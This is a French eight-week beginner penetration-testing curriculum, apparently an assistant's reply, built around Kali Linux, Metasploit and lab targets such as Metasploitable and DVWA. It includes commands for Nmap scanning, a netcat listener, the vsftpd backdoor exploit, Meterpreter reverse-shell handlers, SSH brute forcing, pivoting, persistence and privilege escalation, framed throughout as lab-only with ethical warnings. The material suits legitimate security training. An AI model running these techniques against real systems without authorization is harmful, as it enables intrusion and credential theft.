Parfait — voici le programme détaillé jour-par-jour pour 8 semaines (3
sessions/semaine × ~2 heures par session). Il est conçu pour un débutant
sérieux : installations, commandes utiles, labs pratiques et projets.
Respecte toujours la loi — ne teste que sur des machines que tu
possèdes ou des plateformes autorisées (TryHackMe, Hack The Box,
machines locales).
Plan global
Durée : 8 semaines, 3 sessions/semaine (ex. Lundi / Mercredi /
Vendredi).
Durée par session : 1.5–3 heures (idéal ≈ 2 h).
Matériel requis : PC avec VirtualBox/VMware, images Kali Linux,
Metasploitable / DVWA / OWASP Juice Shop, connexion internet.
Résultat attendu : tu seras capable d’installer Metasploit, effectuer
reconnaissance, exploiter des cibles en lab, faire post-exploitation
basique et automatiser des tâches.
Semaine 1 — Installation & bases
Objectif : monter l’environnement de travail et comprendre le workflow
pentest.
Session 1 (Lundi) — Installation des VMs (2 h)
Installer VirtualBox ou VMware.
Télécharger + importer Kali Linux (VM).
Télécharger Metasploitable2 (VM vulnérable) ou utiliser une
machine VulnHub.
Démarrer Kali → mettre à jour :
o sudo apt update && sudo apt upgrade -y
Vérifier msfconsole : msfconsole --version (Metasploit est préinstallé
sur Kali).
Session 2 (Mercredi) — Concepts de pentest & réseau local (2 h)
Comprendre les phases : recon → scan → exploitation → post.
Configurer réseau VM en host-only ou NAT+port forward pour
isoler le lab.
Trouver IPs : ip a (Kali), ifconfig ou ipconfig pour autres VMs.
Exercice : ping entre Kali et Metasploitable.
Session 3 (Vendredi) — Outils de base (2 h)
Apprendre Nmap : scans basiques
o nmap -sC -sV -oN [Link] <target-ip>
o nmap -p- <target-ip> (scan ports)
Netcat : nc -lvnp 4444 (listener)
Exercice : lancer un scan et interpréter résultats.
Semaine 2 — Découverte Metasploit & modules
Objectif : comprendre modules, recherche, options et exécution.
Session 4 (Lundi) — msfconsole basics (2 h)
Lancer msfconsole. Commandes utiles :
o search vsftpd / search type:exploit platform:linux
o use exploit/unix/…
o show options, set RHOSTS <ip>, set RPORT <port>, exploit
Exercice : chercher un module adapté au service découvert par
Nmap.
Session 5 (Mercredi) — Payloads & handlers (2 h)
Comprendre payloads : set PAYLOAD
linux/x86/meterpreter/reverse_tcp
Lancer handler : use exploit/multi/handler → set PAYLOAD ... → set
LHOST <kali-ip> → run
Exercice : simuler un reverse shell local (écoute + exécution depuis
VM vulnérable contrôlée).
Session 6 (Vendredi) — Auxiliaires & scanners Metasploit (2 h)
Modules auxiliaires : auxiliary/scanner/…
Exemples : scanner SMB, HTTP, FTP via Metasploit.
Exercice : lancer un scanner SMB et comparer avec Nmap.
Semaine 3 — Exploitation pratique (reflected/stored non web)
Objectif : exécuter une exploitation contrôlée sur Metasploitable.
Session 7 (Lundi) — Exécution d’un exploit simple (2 h)
Identifier un service vulnérable (ex. vsftpd backdoor).
search vsftpd → use exploit/unix/ftp/vsftpd_234_backdoor →
configurer RHOSTS/RPORT → exploit.
Observer résultat (shell).
Nettoyage : garder notes et fermer connexions.
Session 8 (Mercredi) — Meterpreter basics (2 h)
Après obtention de Meterpreter : commandes utiles sysinfo, getuid,
ps, shell, upload, download.
Exercice : lister processus et télécharger un fichier permissif.
Session 9 (Vendredi) — Persistence & nettoyage (2 h)
Notions de persistence en lab (ex. persistence Meterpreter script) —
uniquement en lab.
Apprendre à retourner la machine à l’état initial (snapshot VM avant
test).
Semaine 4 — Web security basics & XSS (contexte Metasploit web)
Objectif : apprendre bases du web hacking et liens avec Metasploit.
Session 10 (Lundi) — Introduction aux vulnérabilités web (2 h)
Concepts : XSS, SQLi, CSRF, RCE.
Installer DVWA / JuiceShop sur une VM (ou Docker) et configurer
sécurité basse.
Exercice : trouver une page vulnérable XSS simple.
Session 11 (Mercredi) — Enchaîner reconnaissance web (2 h)
Outils : dirb, gobuster (si installé) : gobuster dir -u [Link] -w
/usr/share/wordlists/dirb/[Link]
Scanner vulnérabilités web depuis Metasploit (auxiliary/scanner/http/
modules).
Exercice : lister directories sensibles.
Session 12 (Vendredi) — Exploits web avec Metasploit (2 h)
Rechercher exploit PHP/CGI/WordPress dans Metasploit.
Exemple : trouver module pour une vieille version de CMS (sur
machine lab).
Exercice : exploiter une vulnérabilité web contrôlée (si lab contient
un exploit disponible).
Semaine 5 — Scanners, brute force & post-exploitation avancé
Objectif : élargir boîte à outils (bruteforce, pivoting de base).
Session 13 (Lundi) — Bruteforce & modules auxiliaires (2 h)
Utiliser auxiliary/scanner/ssh/ssh_login pour tester credentials
(seulement en lab).
Utiliser wordlists (/usr/share/wordlists/[Link]).
Exercice : bruteforce sur account test (lab).
Session 14 (Mercredi) — Pivoting & tunneling (2 h)
Concepts : pivoting, SOCKS proxy via Meterpreter (run autoroute,
use aux/server/socks4a), SSH tunneling.
Exercice : depuis Kali, accéder à une VM interne via tunnel
Meterpreter (lab).
Session 15 (Vendredi) — Escalade de privilèges (2–3 h)
Rechercher vecteurs locaux : services setuid, kernels vulnérables,
scripts cron.
Outils : [Link], linux-exploit-suggester (en lab).
Exercice : pratiquer une escalade sur une VM vulnérable préparée.
Semaine 6 — Automatisation & développement
Objectif : automatiser tâches et comprendre base de création de modules.
Session 16 (Lundi) — Resource scripts & automatisation (2 h)
.rc files : exemple workspace -a lab\nuse
auxiliary/scanner/portscan/tcp\nset RHOSTS [Link]\nrun\nexit
Exercice : écrire un .rc qui scanne puis tente un exploit connu.
Session 17 (Mercredi) — Introduction au dev (Ruby) & lire modules (2 h)
Localiser les modules Metasploit sur Kali (ex. /usr/share/metasploit-
framework/modules/).
Lire un module simple pour comprendre structure (options, exploit
method).
Exercice : modifier un module de démonstration (en lab) pour
apprendre.
Session 18 (Vendredi) — Reporting & preuve (2 h)
Rédiger un rapport basique : résumé, scope, méthodologie,
vulnérabilités, preuve (captures), remediation.
Exercice : produire un rapport pour une attaque lab réalisée.
Semaine 7 — Labs structurés & plateformes en ligne
Objectif : consolider avec plateformes (TryHackMe / Hack The Box) et
challenges.
Session 19 (Lundi) — TryHackMe / HTB onboarding (2 h)
Créer compte TryHackMe (ou HTB), parcourir rooms intro (Metasploit,
Web exploitation).
Commencer une room Metasploit Intro.
Exercice : résoudre 1–2 tasks.
Session 20 (Mercredi) — Capture The Flag (CTF) practice (2–3 h)
Choisir une machine facile (TryHackMe “Starting Point” / HTB easy).
Appliquer flow : reconnaissance → exploit → post → rapport.
Exercice : capturer le flag utilisateur.
Session 21 (Vendredi) — Revue & consolidation (2 h)
Refaire les labs où tu as eu des difficultés.
Compléter le rapport final intermédiaire.
Semaine 8 — Projet final & bonnes pratiques
Objectif : synthèse — réaliser un test complet et documenté.
Session 22 (Lundi) — Préparation du projet final (2 h)
Préparer lab : Kali, Metasploitable, DVWA/JuiceShop. Créer
snapshots.
Définir scope (liste d’IP/machines test).
Session 23 (Mercredi) — Exécution du projet (3 h)
Faire le pentest complet : reconnaissance (Nmap), vuln scanning,
exploitation (Metasploit + manuelle), post-exploitation (Meterpreter),
escalade.
Noter toutes les commandes, captures d’écran et outputs.
Session 24 (Vendredi) — Rapport final & présentation (2–3 h)
Rédiger rapport final : résumé exécutif, techniques, preuves,
remédiations, recommandations.
Préparer une courte présentation (5–10 min) de ton travail (slide ou
doc).
Sauvegarder/snapshots, nettoyer environnements.
Checklists & commandes utiles (raccourci)
Metasploit : msfconsole, search, use, show options, set RHOSTS, set
LHOST, set PAYLOAD, exploit
Nmap : nmap -sC -sV -p- -oN [Link] <ip>
Netcat : nc -lvnp 4444 / nc -nv <ip> <port>
Gobuster : gobuster dir -u [Link] -w
/usr/share/wordlists/dirb/[Link]
Meterpreter : sysinfo, shell, ps, upload, download, getuid, run
post/multi/recon/local_exploit_suggester
Snapshots : toujours créer un snapshot VM avant test risqué.
Ressources d’apprentissage (rapide)
Kali Linux (VM) — pratique quotidienne.
Metasploitable / DVWA / OWASP Juice Shop — environnements
vulnérables.
TryHackMe / Hack The Box — rooms guidées et challenges.
Docs Metasploit (Rapid7) et Metasploit Unleashed (texte).
Avertissements éthiques et sécurité
N’attaque jamais des systèmes réels sans autorisation écrite.
Toujours travailler en environnement isolé/contrôlé.
Respecte la confidentialité et ne publie pas d’exploits contre des
systèmes en production.